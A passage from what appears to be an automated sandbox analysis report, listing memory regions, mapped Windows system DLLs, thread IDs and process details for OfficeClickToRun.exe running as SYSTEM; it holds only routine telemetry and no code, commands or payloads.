Region: id = 15374 start_va = 0x7ffbfff10000 end_va = 0x7ffbfffb7fff entry_point = 0x7ffbfff10000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 15375 start_va = 0x7ffc00110000 end_va = 0x7ffc0016cfff entry_point = 0x7ffc00110000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 15376 start_va = 0x7ffc00170000 end_va = 0x7ffc00186fff entry_point = 0x7ffc00170000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 15377 start_va = 0x7ffc002e0000 end_va = 0x7ffc002eafff entry_point = 0x7ffc002e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 15378 start_va = 0x7ffc004c0000 end_va = 0x7ffc004ebfff entry_point = 0x7ffc004c0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 15379 start_va = 0x7ffc006c0000 end_va = 0x7ffc006e7fff entry_point = 0x7ffc006c0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 15380 start_va = 0x7ffc006f0000 end_va = 0x7ffc0075afff entry_point = 0x7ffc006f0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 15381 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 15382 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 15383 start_va = 0x7ffc00f70000 end_va = 0x7ffc00fb3fff entry_point = 0x7ffc00f70000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 15384 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 15385 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15386 start_va = 0x7ffc01540000 end_va = 0x7ffc015e4fff entry_point = 0x7ffc01540000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 15387 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 15388 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 15389 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 15390 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15391 start_va = 0x7ffc02050000 end_va = 0x7ffc02057fff entry_point = 0x7ffc02050000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 15392 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15393 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 15394 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15395 start_va = 0x7ffc03980000 end_va = 0x7ffc039e8fff entry_point = 0x7ffc03980000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 15396 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 15397 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 15398 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15399 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 1324 os_tid = 0x79c Thread: id = 1325 os_tid = 0x704 Thread: id = 1326 os_tid = 0x6fc Thread: id = 1327 os_tid = 0x6f8 Thread: id = 1328 os_tid = 0x6e4 Thread: id = 1329 os_tid = 0x698 Thread: id = 1330 os_tid = 0x5b8 Thread: id = 1331 os_tid = 0x5b4 Thread: id = 1332 os_tid = 0x5ac Thread: id = 1333 os_tid = 0x570 Thread: id = 1334 os_tid = 0x538 Thread: id = 1335 os_tid = 0x520 Thread: id = 1336 os_tid = 0x4f8 Thread: id = 1337 os_tid = 0x4e0 Thread: id = 1338 os_tid = 0x4c4 Thread: id = 1339 os_tid = 0x4c0 Thread: id = 1340 os_tid = 0x4b4 Thread: id = 1341 os_tid = 0x4b0 Thread: id = 1342 os_tid = 0x4a8 Thread: id = 1343 os_tid = 0x4a0 Thread: id = 1344 os_tid = 0x49c Thread: id = 1345 os_tid = 0x498 Thread: id = 1346 os_tid = 0x494 Thread: id = 1347 os_tid = 0x484 Thread: id = 1348 os_tid = 0x460 Process: id = "291" image_name = "officeclicktorun.exe" filename = "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeclicktorun.exe" page_root = "0x4bd2f000" os_pid = "0x4e4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "280" os_parent_pid = "0x1e4" cmd_line = "\"C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeClickToRun.exe\" /service" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 14343 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 14344 start_va = 0x5aaff00000 end_va = 0x5aaff0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005aaff00000" filename = "" Region: id = 14345 start_va = 0x5aaff10000 end_va = 0x5aaff16fff entry_point = 0x0 region_type = private name = "private_0x0000005aaff10000" filename = "" Region: id = 14346 start_va = 0x5aaff20000 end_va = 0x5aaff33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005aaff20000" filename = "" Region: id = 14347 start_va = 0x5aaff40000 end_va = 0x5ab003ffff entry_point = 0x0 region_type = private name = "private_0x0000005aaff40000" filename = "" Region: id = 14348 start_va = 0x5ab0040000 end_va = 0x5ab0043fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005ab0040000" filename = "" Region: id = 14349 start_va = 0x5ab0050000 end_va = 0x5ab0052fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005ab0050000" filename = "" Region: id = 14350 start_va = 0x5ab0060000 end_va = 0x5ab0061fff entry_point = 0x0 region_type = private name = "private_0x0000005ab0060000" filename = "" Region: id = 14351 start_va = 0x5ab0070000 end_va = 0x5ab012dfff entry_point = 0x5ab0070000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14352 start_va = 0x5ab0130000 end_va = 0x5ab0136fff entry_point = 0x0 region_type = private name = "private_0x0000005ab0130000" filename = "" Region: id = 14353 start_va = 0x5ab0140000 end_va = 0x5ab0140fff entry_point = 0x0 region_type = private name = "private_0x0000005ab0140000" filename = "" Region: id = 14354 start_va = 0x5ab0150000 end_va = 0x5ab0150fff entry_point = 0x0 region_type = private name = "private_0x0000005ab0150000" filename = "" Region: id = 14355 start_va = 0x5ab0160000 end_va = 0x5ab0160fff entry_point = 0x0 region_type = private name = "private_0x0000005ab0160000" filename = "" Region: id = 14356 start_va = 0x5ab0170000 end_va = 0x5ab0170fff entry_point = 0x0 region_type = private name = "private_0x0000005ab0170000" filename = "" Region: id = 14357 start_va = 0x5ab0180000 end_va = 0x5ab0181fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005ab0180000" filename = "" Region: id = 14358 start_va = 0x5ab0190000 end_va = 0x5ab0190fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005ab0190000" filename = "" Region: id = 14359 start_va = 0x5ab01a0000 end_va = 0x5ab01a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005ab01a0000" filename = "" Region: id = 14360 start_va = 0x5ab01b0000 end_va = 0x5ab01b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005ab01b0000" filename = "" Region: id = 14361 start_va = 0x5ab01c0000 end_va = 0x5ab02bffff entry_point = 0x0 region_type = private name = "private_0x0000005ab01c0000" filename = "" Region: id = 14362 start_va = 0x5ab02c0000 end_va = 0x5ab03bffff entry_point = 0x0 region_type = private name = "private_0x0000005ab02c0000" filename = "" Region: id = 14363 start_va = 0x5ab03c0000 end_va = 0x5ab047ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005ab03c0000" filename = "" Region: id = 14364 start_va = 0x5ab0480000 end_va = 0x5ab0480fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005ab0480000" filename = "" Region: id = 14365 start_va = 0x5ab0490000 end_va = 0x5ab0490fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005ab0490000" filename = "" Region: id = 14366 start_va = 0x5ab04a0000 end_va = 0x5ab04a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005ab04a0000" filename = "" Region: id = 14367 start_va = 0x5ab04b0000 end_va = 0x5ab04b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005ab04b0000" filename = "" Region: id = 14368 start_va = 0x5ab04c0000 end_va = 0x5ab04c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005ab04c0000" filename = "" Region: id = 14369 start_va = 0x5ab04d0000 end_va = 0x5ab04d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005ab04d0000" filename = "" Region: id = 14370 start_va = 0x5ab04e0000 end_va = 0x5ab04e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005ab04e0000" filename = "" Region: id = 14371 start_va = 0x5ab04f0000 end_va = 0x5ab04f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005ab04f0000" filename = "" Region: id = 14372 start_va = 0x5ab0500000 end_va = 0x5ab0500fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005ab0500000" filename = "" Region: id = 14373 start_va = 0x5ab0510000 end_va = 0x5ab0510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005ab0510000" filename = "" Region: id = 14374 start_va = 0x5ab0520000 end_va = 0x5ab052ffff entry_point = 0x0 region_type = private name = "private_0x0000005ab0520000" filename = "" Region: id = 14375 start_va = 0x5ab0530000 end_va = 0x5ab06b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005ab0530000" filename = "" Region: id = 14376 start_va = 0x5ab06c0000 end_va = 0x5ab0840fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005ab06c0000" filename = "" Region: id = 14377 start_va = 0x5ab0850000 end_va = 0x5ab0b86fff entry_point = 0x5ab0850000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 14378 start_va = 0x5ab0b90000 end_va = 0x5ab0dacfff entry_point = 0x5ab0b90000 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 14379 start_va = 0x5ab0db0000 end_va = 0x5ab0eaffff entry_point = 0x0 region_type = private name = "private_0x0000005ab0db0000" filename = "" Region: id = 14380 start_va = 0x5ab0eb0000 end_va = 0x5ab0faffff entry_point = 0x0 region_type = private name = "private_0x0000005ab0eb0000" filename = "" Region: id = 14381 start_va = 0x5ab0fb0000 end_va = 0x5ab10affff entry_point = 0x0 region_type = private name = "private_0x0000005ab0fb0000" filename = "" Region: id = 14382 start_va = 0x5ab10b0000 end_va = 0x5ab11affff entry_point = 0x0 region_type = private name = "private_0x0000005ab10b0000" filename = "" Region: id = 14383 start_va = 0x5ab11b0000 end_va = 0x5ab12affff entry_point = 0x0 region_type = private name = "private_0x0000005ab11b0000" filename = "" Region: id = 14384 start_va = 0x5ab12b0000 end_va = 0x5ab14affff entry_point = 0x0 region_type = private name = "private_0x0000005ab12b0000" filename = "" Region: id = 14385 start_va = 0x5ab14b0000 end_va = 0x5ab15affff entry_point = 0x0 region_type = private name = "private_0x0000005ab14b0000" filename = "" Region: id = 14386 start_va = 0x5ab15b0000 end_va = 0x5ab16bcfff entry_point = 0x0 region_type = private name = "private_0x0000005ab15b0000" filename = "" Region: id = 14387 start_va = 0x5ab16c0000 end_va = 0x5ab18cefff entry_point = 0x0 region_type = private name = "private_0x0000005ab16c0000" filename = "" Region: id = 14388 start_va = 0x5ab18d0000 end_va = 0x5ab19cffff entry_point = 0x0 region_type = private name = "private_0x0000005ab18d0000" filename = "" Region: id = 14389 start_va = 0x5ab19d0000 end_va = 0x5ab1acffff entry_point = 0x0 region_type = private name = "private_0x0000005ab19d0000" filename = "" Region: id = 14390 start_va = 0x5ab1ad0000 end_va = 0x5ab1bcffff entry_point = 0x0 region_type = private name = "private_0x0000005ab1ad0000" filename = "" Region: id = 14391 start_va = 0x5ab1bd0000 end_va = 0x5ab1ccffff entry_point = 0x0 region_type = private name = "private_0x0000005ab1bd0000" filename = "" Region: id = 14392 start_va = 0x5ab1cd0000 end_va = 0x5ab1cd0fff entry_point = 0x5ab1cd0000 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 14393 start_va = 0x5ab1ce0000 end_va = 0x5ab1ce6fff entry_point = 0x0 region_type = private name = "private_0x0000005ab1ce0000" filename = "" Region: id = 14394 start_va = 0x5ab1cf0000 end_va = 0x5ab1cf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005ab1cf0000" filename = "" Region: id = 14395 start_va = 0x5ab1d00000 end_va = 0x5ab1d00fff entry_point = 0x5ab1d00000 region_type = mapped_file name = "counters.dat" filename = "\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\windows\\system32\\config\\systemprofile\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 14396 start_va = 0x5ab1d10000 end_va = 0x5ab1d14fff entry_point = 0x5ab1d10000 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 14397 start_va = 0x5ab1d20000 end_va = 0x5ab1d2ffff entry_point = 0x5ab1d20000 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 14398 start_va = 0x5ab1d30000 end_va = 0x5ab1d32fff entry_point = 0x5ab1d30000 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 14399 start_va = 0x5ab1d40000 end_va = 0x5ab1d41fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005ab1d40000" filename = "" Region: id = 14400 start_va = 0x5ab1d50000 end_va = 0x5ab1d59fff entry_point = 0x5ab1d50000 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui") Region: id = 14401 start_va = 0x5ab1d80000 end_va = 0x5ab1d8ffff entry_point = 0x0 region_type = private name = "private_0x0000005ab1d80000" filename = "" Region: id = 14402 start_va = 0x5ab1dd0000 end_va = 0x5ab1ecffff entry_point = 0x0 region_type = private name = "private_0x0000005ab1dd0000" filename = "" Region: id = 14403 start_va = 0x5ab1ed0000 end_va = 0x5ab1fcffff entry_point = 0x0 region_type = private name = "private_0x0000005ab1ed0000" filename = "" Region: id = 14404 start_va = 0x5ab1fd0000 end_va = 0x5ab20cffff entry_point = 0x0 region_type = private name = "private_0x0000005ab1fd0000" filename = "" Region: id = 14405 start_va = 0x5ab20d0000 end_va = 0x5ab20d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005ab20d0000" filename = "" Region: id = 14406 start_va = 0x5ab20e0000 end_va = 0x5ab21dffff entry_point = 0x0 region_type = private name = "private_0x0000005ab20e0000" filename = "" Region: id = 14407 start_va = 0x5ab21e0000 end_va = 0x5ab22dffff entry_point = 0x0 region_type = private name = "private_0x0000005ab21e0000" filename = "" Region: id = 14408 start_va = 0x5ab22e0000 end_va = 0x5ab23dffff entry_point = 0x0 region_type = private name = "private_0x0000005ab22e0000" filename = "" Region: id = 14409 start_va = 0x5ab23e0000 end_va = 0x5ab27dffff entry_point = 0x0 region_type = private name = "private_0x0000005ab23e0000" filename = "" Region: id = 14410 start_va = 0x5ab27e0000 end_va = 0x5ab28befff entry_point = 0x5ab27e0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 14411 start_va = 0x5ab28c0000 end_va = 0x5ab29bffff entry_point = 0x0 region_type = private name = "private_0x0000005ab28c0000" filename = "" Region: id = 14412 start_va = 0x5ab29c0000 end_va = 0x5ab2bbffff entry_point = 0x0 region_type = private name = "private_0x0000005ab29c0000" filename = "" Region: id = 14413 start_va = 0x5ab2bc0000 end_va = 0x5ab2fbffff entry_point = 0x0 region_type = private name = "private_0x0000005ab2bc0000" filename = "" Region: id = 14414 start_va = 0x5ab2fc0000 end_va = 0x5ab37bffff entry_point = 0x0 region_type = private name = "private_0x0000005ab2fc0000" filename = "" Region: id = 14415 start_va = 0x5ab37c0000 end_va = 0x5ab478ffff entry_point = 0x0 region_type = private name = "private_0x0000005ab37c0000" filename = "" Region: id = 14416 start_va = 0x5ab4890000 end_va = 0x5ab498ffff entry_point = 0x0 region_type = private name = "private_0x0000005ab4890000" filename = "" Region: id = 14417 start_va = 0x5ab4990000 end_va = 0x5ab4a8ffff entry_point = 0x0 region_type = private name = "private_0x0000005ab4990000" filename = "" Region: id = 14418 start_va = 0x5ab4ec0000 end_va = 0x5ab5e8ffff entry_point = 0x0 region_type = private name = "private_0x0000005ab4ec0000" filename = "" Region: id = 14419 start_va = 0x5ab66a0000 end_va = 0x5ab766ffff entry_point = 0x0 region_type = private name = "private_0x0000005ab66a0000" filename = "" Region: id = 14420 start_va = 0x7df5ff5c0000 end_va = 0x7ff5ff5bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff5c0000" filename = "" Region: id = 14421 start_va = 0x7ff736308000 end_va = 0x7ff736309fff entry_point = 0x0 region_type = private name = "private_0x00007ff736308000" filename = "" Region: id = 14422 start_va = 0x7ff73630a000 end_va = 0x7ff73630bfff entry_point = 0x0 region_type = private name = "private_0x00007ff73630a000" filename = "" Region: id = 14423 start_va = 0x7ff73630c000 end_va = 0x7ff73630dfff entry_point = 0x0 region_type = private name = "private_0x00007ff73630c000" filename = "" Region: id = 14424 start_va = 0x7ff73630e000 end_va = 0x7ff73630ffff entry_point = 0x0 region_type = private name = "private_0x00007ff73630e000" filename = "" Region: id = 14425 start_va = 0x7ff736310000 end_va = 0x7ff736311fff entry_point = 0x0 region_type = private name = "private_0x00007ff736310000" filename = "" Region: id = 14426 start_va = 0x7ff736312000 end_va = 0x7ff736313fff entry_point = 0x0 region_type = private name = "private_0x00007ff736312000" filename = "" Region: id = 14427 start_va = 0x7ff736314000 end_va = 0x7ff736315fff entry_point = 0x0 region_type = private name = "private_0x00007ff736314000" filename = "" Region: id = 14428 start_va = 0x7ff736318000 end_va = 0x7ff736319fff entry_point = 0x0 region_type = private name = "private_0x00007ff736318000" filename = "" Region: id = 14429 start_va = 0x7ff73631a000 end_va = 0x7ff73631bfff entry_point = 0x0 region_type = private name = "private_0x00007ff73631a000" filename = "" Region: id = 14430 start_va = 0x7ff73631c000 end_va = 0x7ff73631dfff entry_point = 0x0 region_type = private name = "private_0x00007ff73631c000" filename = "" Region: id = 14431 start_va = 0x7ff73631e000 end_va = 0x7ff73631ffff entry_point = 0x0 region_type = private name = "private_0x00007ff73631e000" filename = "" Region: id = 14432 start_va = 0x7ff736320000 end_va = 0x7ff73641ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff736320000" filename = "" Region: id = 14433 start_va = 0x7ff736420000 end_va = 0x7ff736442fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff736420000" filename = "" Region: id = 14434 start_va = 0x7ff736443000 end_va = 0x7ff736444fff entry_point = 0x0 region_type = private name = "private_0x00007ff736443000" filename = "" Region: id = 14435 start_va = 0x7ff736445000 end_va = 0x7ff736446fff entry_point = 0x0 region_type = private name = "private_0x00007ff736445000" filename = "" Region: id = 14436 start_va = 0x7ff736447000 end_va = 0x7ff736448fff entry_point = 0x0 region_type = private name = "private_0x00007ff736447000" filename = "" Region: id = 14437 start_va = 0x7ff736449000 end_va = 0x7ff73644afff entry_point = 0x0 region_type = private name = "private_0x00007ff736449000" filename = "" Region: id = 14438 start_va = 0x7ff73644b000 end_va = 0x7ff73644cfff entry_point = 0x0 region_type = private name = "private_0x00007ff73644b000" filename = "" Region: id = 14439 start_va = 0x7ff73644d000 end_va = 0x7ff73644efff entry_point = 0x0 region_type = private name = "private_0x00007ff73644d000" filename = "" Region: id = 14440 start_va = 0x7ff73644f000 end_va = 0x7ff73644ffff entry_point = 0x0 region_type = private name = "private_0x00007ff73644f000" filename = "" Region: id = 14441 start_va = 0x7ff736c00000 end_va = 0x7ff737367fff entry_point = 0x7ff736c00000 region_type = mapped_file name = "officeclicktorun.exe" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeclicktorun.exe") Region: id = 14442 start_va = 0x7ffbeda10000 end_va = 0x7ffbeda23fff entry_point = 0x7ffbeda10000 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 14443 start_va = 0x7ffbedac0000 end_va = 0x7ffbedadefff entry_point = 0x7ffbedac0000 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 14444 start_va = 0x7ffbf2120000 end_va = 0x7ffbf2396fff entry_point = 0x7ffbf2120000 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 14445 start_va = 0x7ffbf25b0000 end_va = 0x7ffbf262ffff entry_point = 0x7ffbf25b0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 14446 start_va = 0x7ffbf5c50000 end_va = 0x7ffbf5ef6fff entry_point = 0x7ffbf5c50000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 14447 start_va = 0x7ffbf6fc0000 end_va = 0x7ffbf7156fff entry_point = 0x7ffbf6fc0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 14448 start_va = 0x7ffbf7b30000 end_va = 0x7ffbf7b3dfff entry_point = 0x7ffbf7b30000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 14449 start_va = 0x7ffbf9250000 end_va = 0x7ffbf9264fff entry_point = 0x7ffbf9250000 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 14450 start_va = 0x7ffbf9380000 end_va = 0x7ffbf96f5fff entry_point = 0x7ffbf9380000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 14451 start_va = 0x7ffbf9f50000 end_va = 0x7ffbf9f59fff entry_point = 0x7ffbf9f50000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 14452 start_va = 0x7ffbfa220000 end_va = 0x7ffbfa25efff entry_point = 0x7ffbfa220000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 14453 start_va = 0x7ffbfa260000 end_va = 0x7ffbfa2acfff entry_point = 0x7ffbfa260000 region_type = mapped_file name = "appvfilesystemmetadata.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvfilesystemmetadata.dll") Region: id = 14454 start_va = 0x7ffbfa2b0000 end_va = 0x7ffbfa40dfff entry_point = 0x7ffbfa2b0000 region_type = mapped_file name = "appvisvsubsystemcontroller.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystemcontroller.dll") Region: id = 14455 start_va = 0x7ffbfa460000 end_va = 0x7ffbfa669fff entry_point = 0x7ffbfa460000 region_type = mapped_file name = "appvintegration.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvintegration.dll") Region: id = 14456 start_va = 0x7ffbfa670000 end_va = 0x7ffbfa6fcfff entry_point = 0x7ffbfa670000 region_type = mapped_file name = "appvisvvirtualization.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvvirtualization.dll") Region: id = 14457 start_va = 0x7ffbfa700000 end_va = 0x7ffbfa7a1fff entry_point = 0x7ffbfa700000 region_type = mapped_file name = "appvcatalog.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcatalog.dll") Region: id 